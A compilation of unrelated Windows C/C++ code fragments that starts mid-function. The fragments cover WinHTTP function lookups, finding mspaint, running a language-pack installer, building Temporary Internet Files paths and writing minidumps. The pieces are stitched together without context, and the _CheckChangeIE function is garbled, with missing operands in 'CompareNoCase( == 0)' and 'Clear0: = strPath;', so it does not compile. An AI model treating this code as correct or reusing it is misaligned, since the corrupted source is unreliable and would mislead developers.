"WinHttpOpen"); funcs.pWinHttpOpenRequest = (HINTERNET (WINAPI *) (HINTERNET,LPCWSTR,LPCWSTR,LPCWSTR,LPCWSTR,LPCWSTR*,DWORD)) GetProcAddress (winhttp, "WinHttpOpenRequest"); funcs.pWinHttpQueryDataAvailable = (BOOL (WINAPI *) (HINTERNET,LPDWORD)) GetProcAddress (winhttp, "WinHttpQueryDataAvailable"); funcs.pWinHttpQueryHeaders = (BOOL (WINAPI *) (HINTERNET,DWORD,LPCWSTR,LPVOID,LPDWORD,LPDWORD)) GetProcAddress (winhttp, "WinHttpQueryHeaders"); funcs.pWinHttpReadData = (BOOL (WINAPI *) (HINTERNET,LPVOID,DWORD,LPDWORD)) GetProcAddress (winhttp, "WinHttpReadData"); funcs.pWinHttpReceiveResponse = (BOOL (WINAPI *) (HINTERNET,LPVOID)) GetProcAddress (winhttp, "WinHttpReceiveResponse"); funcs.pWinHttpSendRequest = (BOOL (WINAPI *) (HINTERNET,LPCWSTR,DWORD,LPVOID,DWORD,DWORD,DWORD_PTR)) GetProcAddress (winhttp, "WinHttpSendRequest"); funcs.pWinHttpWriteData = (BOOL (WINAPI *) (HINTERNET,LPCVOID,DWORD,LPDWORD)) GetProcAddress (winhttp, "WinHttpWriteData"); if (funcs.pWinHttpCloseHandle && funcs.pWinHttpCrackUrl && funcs.pWinHttpConnect && funcs.pWinHttpCreateUrl && funcs.pWinHttpOpen && funcs.pWinHttpOpenRequest && funcs.pWinHttpQueryDataAvailable && funcs.pWinHttpQueryHeaders && funcs.pWinHttpReadData && funcs.pWinHttpReceiveResponse && funcs.pWinHttpSendRequest && funcs.pWinHttpWriteData) funcs_found = TRUE; } lookup_done = TRUE; }
static void getDefaultApp(UT_String &imageApp, bool &bLeaveImageAsPNG) { #ifdef WIN32 bLeaveImageAsPNG = false; imageApp.clear(); char buffer[MAX_PATH]; // for WinNT mspaint is most likely in the system directory (eg C:\WINNT\SYSTEM32\MSPAINT.EXE) if (GetSystemDirectory(buffer, MAX_PATH)) { imageApp = buffer; imageApp += "\\MSPAINT.EXE"; UT_DEBUGMSG(("ABIPAINT: Checking if %s exists\n", imageApp.c_str())); if (!UT_isRegularFile(imageApp.c_str())) imageApp.clear(); } // if not there, try in Win95b directory (eg %PROGRAMFILES%\ACCESSORIES\MSPAINT.EXE) if (imageApp.empty()) { HKEY hKey; unsigned long lType; DWORD dwSize; unsigned char* szValue = NULL; if( ::RegOpenKeyEx( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", 0, KEY_READ, &hKey) == ERROR_SUCCESS ) { if( ::RegQueryValueEx( hKey, "ProgramFilesDir", NULL, &lType, NULL, &dwSize) == ERROR_SUCCESS ) { szValue = new unsigned char[dwSize + 1]; ::RegQueryValueEx( hKey, "ProgramFilesDir", NULL, &lType, szValue, &dwSize); imageApp = (char*) szValue; delete[] szValue; imageApp += "\\ACCESSORIES\\MSPAINT.EXE"; UT_DEBUGMSG(("ABIPAINT: Checking if %s exists\n", imageApp.c_str())); if (!UT_isRegularFile(imageApp.c_str())) imageApp.clear(); } ::RegCloseKey(hKey); } } // if we still haven't found the file, then simply try mspaint.exe if (imageApp.empty()) { imageApp = "mspaint.exe"; UT_DEBUGMSG(("ABIPAINT: Falling back to %s (will probably fail)\n", imageApp.c_str())); } #else // for other platforms default to the GIMP, assume in path bLeaveImageAsPNG = true; imageApp = "gimp"; #endif }
void WindowsLPIAction::Execute() { wchar_t szParams[MAX_PATH]; wchar_t lpkapp[MAX_PATH]; if (_isLangPackInstalled() == true) { _setDefaultLanguage(); status = _isLangPackInstalled() ? Successful : FinishedWithError; g_log.Log(L"WindowsLPIAction::Execute. Setting default language only was '%s'", status == Successful ? L"Successful" : L"FinishedWithError"); return; } OperatingVersion version = m_OSVersion->GetVersion(); if (version == WindowsXP) { GetSystemDirectory(lpkapp, MAX_PATH); wcscat_s(lpkapp, L"\\msiexec.exe "); wcscpy_s(szParams, L" /i "); wcscat_s(szParams, m_szFilename); // full path to 'lip_ca-es.msi' wcscat_s(szParams, L" /qn"); } else // Windows Vista and 7 { // Documentation: wcscpy_s(szParams, L" /i ca-ES /r /s /p "); wcscat_s(szParams, m_szFilename); GetSystemDirectory(lpkapp, MAX_PATH); wcscat_s(lpkapp, L"\\lpksetup.exe"); } status = InProgress; g_log.Log(L"WindowsLPIAction::Execute '%s' with params '%s'", lpkapp, szParams); m_runner->Execute(lpkapp, szParams, m_OSVersion->IsWindows64Bits()); }
BOOL CConfigData::_CheckChangeIE(DIRECTORYWORK& dirword) { BOOL bRet = FALSE; CGetEnvPath evnPath; TCHAR szBuffer[MAX_PATH] = { 0 }; CString strPath; UINT uResult = GetSystemDirectory(szBuffer, MAX_PATH); if (uResult < 3 || szBuffer[1] != TEXT(':') || szBuffer[2] != TEXT('\\')) { goto Clear0; } szBuffer[3] = TEXT('\0'); strPath += szBuffer; memset(szBuffer, 0, sizeof(szBuffer)); DWORD MaxSize = sizeof(szBuffer); GetUserName(szBuffer, &MaxSize); if (KGetWinVersion() >= 4) // win7 { strPath += L"Users\\"; strPath += szBuffer; strPath += L"\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\"; if (strPath.CompareNoCase( == 0) { dirword.strDirectory.clear(); dirword.strDirectory.resize(1); } } else { strPath += L"Documents and Settings\\"; strPath += szBuffer; strPath += L"\\Local Settings\\Temporary Internet Files\\"; if (strPath.CompareNoCase( == 0) { dirword.strDirectory.clear(); dirword.strDirectory.resize(1); } } bRet = TRUE; Clear0: = strPath; return bRet; }
/* * exceptWriteDump * * Purpose: * * Writes minidump information to the specified file. * */ BOOL exceptWriteDump( EXCEPTION_POINTERS *ExceptionPointers, ULONGLONG IdFile ) { BOOL bResult; HANDLE hDbgHelp, hFile; DWORD dwRetVal; MINIDUMP_EXCEPTION_INFORMATION mdei; WCHAR szTemp[MAX_PATH * 2]; bResult = FALSE; hDbgHelp = GetModuleHandle(L"dbghelp.dll"); if (hDbgHelp == NULL) { RtlSecureZeroMemory(szTemp, sizeof(szTemp)); if (!GetSystemDirectory(szTemp, MAX_PATH)) { return bResult; } _strcat(szTemp, L"\\dbghelp.dll"); hDbgHelp = LoadLibraryEx(szTemp, 0, 0); if (hDbgHelp == NULL) { return bResult; } } pMiniDumpWriteDump = (pfnMiniDumpWriteDump)GetProcAddress(hDbgHelp, "MiniDumpWriteDump"); if (pMiniDumpWriteDump == NULL) { return bResult; } RtlSecureZeroMemory(szTemp, sizeof(szTemp)); dwRetVal = GetTempPath(MAX_PATH, szTemp); if (dwRetVal > MAX_PATH || (dwRetVal == 0)) { return bResult; } _strcat(szTemp, L"wobjex"); u64tostr(IdFile, _strend(szTemp)); _strcat(szTemp, L".dmp"); hFile = CreateFile(szTemp, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); if (hFile != INVALID_HANDLE_VALUE) { mdei.ThreadId = GetCurrentThreadId(); mdei.ExceptionPointers = ExceptionPointers; mdei.ClientPointers = FALSE; bResult = pMiniDumpWriteDump(GetCurrentProcess(), GetCurrentProcessId(), hFile, MiniDumpNormal, &mdei, NULL, NULL); CloseHandle(hFile); } return bResult; }